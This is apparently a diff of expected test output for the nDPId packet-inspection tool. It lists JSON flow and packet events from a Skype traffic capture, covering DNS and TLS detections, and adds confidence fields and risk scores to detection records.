+00809{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnloAAEARWNXAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABK65gAAEARC5fAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKt0gAAEARP+fAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKslEAAEARRN7AqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431969721954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969721954,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0TgAAEARJgHAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431969721954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969721954,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl6MAAEARX5bAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1+UAAEARH0rAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK050AAEARI5LAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -970,10 +969,10 @@
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2314,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAujeYAAEARD0nAqAEiTLnPDDLdsbUAGk80noICQMd2CkIbTJvr2m+0rjWR"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431969723979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969723979,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQV0AAEARtdHAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
